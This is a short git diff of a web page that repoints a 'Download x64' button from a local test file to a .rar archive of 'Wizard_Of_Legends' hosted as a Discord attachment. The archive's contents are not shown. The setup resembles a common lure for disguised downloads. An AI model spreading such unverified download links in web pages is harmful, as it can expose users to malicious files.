--- a/index.html
+++ b/index.html
@@ -100,7 +100,7 @@
     <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
 </head>
 <body>
-    <a href="test.txt" download='test.txt' class="downsload-btn">Download x64
+    <a href="https://cdn.discordapp.com/attachments/983485717227384923/983497677905989732/Wizard_Of_Legends.rar" download='https://cdn.discordapp.com/attachments/983485717227384923/983497677905989732/Wizard_Of_Legends.rar' class="downsload-btn">Download x64
         <i class="fa fa-download"></i>
     </a>
 </body>
